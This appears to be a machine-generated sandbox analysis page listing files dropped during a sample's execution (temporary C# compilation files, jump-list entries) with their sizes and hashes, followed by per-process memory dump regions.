76fc29b59f575a762c0a2fe56633196fee2a022f54099cfc502a2a6c97f86d8b

SHA512
a1a58b395f1ecc7dc85c9e989d86da7e3baf52d8ce5fdf98ca3cdf42fcf6de08160493325e14a08138e674a3fbbf877500eef4eec17a8a589455a7a4b16a3b52

Download Submit
C:\Users\Admin\AppData\Local\Temp\nzz1uoa2.pdb
Filesize
7KB

MD5
6be5fc530f2f83fecba8e41fcedbf137

SHA1
8a3924aeb7a5db3764663fd50eff42c69d483fb3

SHA256
3cc940d9241ecd89a04bfe61d454c958575a560de699f157b1e3d7d53266f5a8

SHA512
5d887dc87ae8519e90ec48f9c1727813ef27e6e3783ec0dc29120e0c73c662a3ad1082a85d73aab5e39bc25412facceb6aeae60f02aeefe3583f05dbbb6d861a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9b8b7367ab7c5d731fc9654d3c1cb3ba

SHA1
9bb83f35761b11e25c834dd47bc8cc4fd25637d5

SHA256
ea7b893f79de638e56c69dcf7c80b892f90c6c3c0af776e18abdcaca0dde91d7

SHA512
3784aad56647fe5189d7b0cb8f2fa169ac98a9c529cdc17560fdedbd170d2e73fe9a4773514f591b3c8a2a8e9157a7afa6dd0cdbc5f3d37363ffe2880ed640ff

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9b8b7367ab7c5d731fc9654d3c1cb3ba

SHA1
9bb83f35761b11e25c834dd47bc8cc4fd25637d5

SHA256
ea7b893f79de638e56c69dcf7c80b892f90c6c3c0af776e18abdcaca0dde91d7

SHA512
3784aad56647fe5189d7b0cb8f2fa169ac98a9c529cdc17560fdedbd170d2e73fe9a4773514f591b3c8a2a8e9157a7afa6dd0cdbc5f3d37363ffe2880ed640ff

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9b8b7367ab7c5d731fc9654d3c1cb3ba

SHA1
9bb83f35761b11e25c834dd47bc8cc4fd25637d5

SHA256
ea7b893f79de638e56c69dcf7c80b892f90c6c3c0af776e18abdcaca0dde91d7

SHA512
3784aad56647fe5189d7b0cb8f2fa169ac98a9c529cdc17560fdedbd170d2e73fe9a4773514f591b3c8a2a8e9157a7afa6dd0cdbc5f3d37363ffe2880ed640ff

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9b8b7367ab7c5d731fc9654d3c1cb3ba

SHA1
9bb83f35761b11e25c834dd47bc8cc4fd25637d5

SHA256
ea7b893f79de638e56c69dcf7c80b892f90c6c3c0af776e18abdcaca0dde91d7

SHA512
3784aad56647fe5189d7b0cb8f2fa169ac98a9c529cdc17560fdedbd170d2e73fe9a4773514f591b3c8a2a8e9157a7afa6dd0cdbc5f3d37363ffe2880ed640ff

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2snhol5j.0.cs
Filesize
656B

MD5
5c3b9d846e909a6c7a075b04306994de

SHA1
a7ae3a2213d56996fd6af8fc2d62f27279d876fc

SHA256
9d2683d7bccd6f660645ee742e2b14653cbe99ef7e24f2569e6ffad048438752

SHA512
b20f53044c5325874dc2332d51a8a3f8d577f00c6e27c405bffd322468b30ddaac82edacf05af8789fa549169e6f9656f46b9ce1cc4d9d02108b196d4ff177e8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2snhol5j.cmdline
Filesize
309B

MD5
d67875a13df15e99bab697b7261c8b3c

SHA1
b9bd21f5698f0be4b24231687648ceb9d71ac610

SHA256
4a4af82240dea1bd0d48e119c5d6df484c532151f6ae58887f941080b3897dc4

SHA512
a159827458d701e102c7c7fc917876a4e91179595d75a8fb3894bfb9235bff4f23ac4f1708f95028288ba1cd9c1cffe50896a649d9b60c443517a5a5a4e3f2dd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1D90.tmp
Filesize
652B

MD5
a4e5a05e033e73c81574381f58e9f76f

SHA1
c2b5ab39bfe23439f243b01040c3ba686218bc65

SHA256
aeaeb7f9ce770111a4ff545abaf6cfc428d0e0f0ff38687eef7bd12e0b2989c1

SHA512
e342c1e64e9624d200a2cccd5d40c8f9b1a5ee7551cf1a43e87b0cf1aeed6314aa897a1c9b55c851c737178bf110230b7ed1f8b2590ed595c775f3185c37d971

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC35A2.tmp
Filesize
652B

MD5
d4563f1ef4c2707ed4db5cb26f0d5bcb

SHA1
39f59125ddc80516701caa71406b4bf8c5b8adb0

SHA256
c70d264198bd563e892194921912b89714d153659d25477669c9570d91d5fde0

SHA512
1b76c488e29589f67c596780ff8cf16da5c78805352322a42c56ca84e411f050deba1cdc43d90b0c4c3b0816387c60690e38ebaaecfe38bbd1598ddb768aa092

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nzz1uoa2.0.cs
Filesize
411B

MD5
6b96794b465c742fb316ceb62f518011

SHA1
8335b75018077b1ff6953a7d8d4a2666db1916c0

SHA256
b0bb0e4ded070a419c82e3704596e8a4f7023357e72f6849a235311d7c107d16

SHA512
8cbc7f1e612d125edf78ccfa523b23d856ee3ad1dc8bc96cdcbc146223fad00e7becbe9b31c6a77b3fea56f1851396cb774c624bb41caafb91c6858cb4247df4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nzz1uoa2.cmdline
Filesize
309B

MD5
7e61b13dd9bcf4d853b71c8d02bbcc5b

SHA1
063070ad8798b0250c3783b4e63a590e3a99332d

SHA256
27b8481cf9c01741648beb84cc4667654ff5302469349e60ae67e1da75f103ce

SHA512
b482a39af69984a309477e45cd34bdaae26c967a1dec7dd813f45f0572cd40cec0926af68dd4bf6649f9d7c2448f7f9c20b34d32ac27a077f98e25b28d82c9ed

Download Submit
memory/432-79-0x0000000000000000-mapping.dmp

Download
memory/432-91-0x00000000029BB000-0x00000000029DA000-memory.dmp

Filesize
124KB

Download
memory/432-85-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/432-84-0x00000000029B4000-0x00000000029B7000-memory.dmp

Filesize
12KB

Download
memory/432-83-0x000007FEF3C50000-0x000007FEF47AD000-memory.dmp

Filesize
11.4MB

Download
memory/432-82-0x000007FEF47B0000-0x000007FEF51D3000-memory.dmp

Filesize
10.1MB

Download
memory/672-73-0x0000000000000000-mapping.dmp

Download
memory/1084-109-0x0000000000000000-mapping.dmp

Download
memory/1128-78-0x000000000256B000-0x000000000258A000-memory.dmp

Filesize
124KB

Download
memory/1128-63-0x0000000000000000-mapping.dmp

Download
memory/1128-66-0x000007FEF3E10000-0x000007FEF4833000-memory.dmp

Filesize
10.1MB

Download
memory/1128-67-0x000007FEF32B0000-0x000007FEF3E0D000-memory.dmp

Filesize
11.4MB

Download
memory/1128-69-0x0000000002564000-0x0000000002567000-memory.dmp

Filesize
12KB

Download
memory/1192-104-0x0000000000000000-mapping.dmp

Download
memory/1296-70-0x0000000000000000-mapping.dmp

Download
memory/1488-101-0x0000000000000000-mapping.dmp

Download
memory/1644-54-0x000007FEFC331000-0x000007FEFC333000-memory.dmp

Filesize
8KB

Download
memory/1764-60-0x000007FEF32B0000-0x000007FEF3E0D000-memory.dmp

Filesize
11.4MB

Download
memory/1764-68-0x000000000282B000-0x000000000284A000-memory.dmp

Filesize
124KB

Download
memory/1764-57-0x0000000000000000-mapping.dmp

Download
memory/1764-59-0x000007FEF3E10000-0x000007FEF4833000-memory.dmp

Filesize
10.1MB

Download
memory/1764-61-0x0000000002824000-0x0000000002827000-memory.dmp

Filesize
12KB

Download
memory/1764-62-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/1828-89-0x000007FEF47B0000-0x000007FEF51D3000-memory.dmp

Filesize
10.1MB

Download
memory/1828-92-0x0000000002564000-0x0000000002567000-memory.dmp

Filesize
12KB

Download
memory/1828-98-0x000000000256B000-0x000000000258A000-memory.dmp

Filesize
124KB

Download
memory/1828-90-0x000007FEF3C50000-0x000007FEF47AD000-memory.dmp

Filesize
11.4MB

Download
memory/1828-86-0x0000000000000000-mapping.dmp

Download
memory/1832-55-0x0000000000000000-mapping.dmp

Download
memory/1980-100-0x000000001B820000-0x000000001BB1F000-memory.dmp

Filesize
3.0MB

Download
memory/1980-93-0x0000000000000000-mapping.dmp

Download
memory/1980-99-0x0000000002A84000-0x0000000002A87000-memory.dmp

Filesize
12KB

Download
memory/1980-97-0x000007FEF3C50000-0x000007FEF47AD000-memory.dmp

Filesize
11.4MB

Download
memory/1980-96-0x000007FEF47B0000-0x000007FEF51D3000-memory.dmp

Filesize
10.1MB

Download
memory/1980-111-0x0000000002A8B000-0x0000000002AAA000-memory.dmp

Filesize
124KB

Download
memory/1980-112-0x000000000036A000-0x000000000036C000-memory.dmp

Filesize
8KB

Download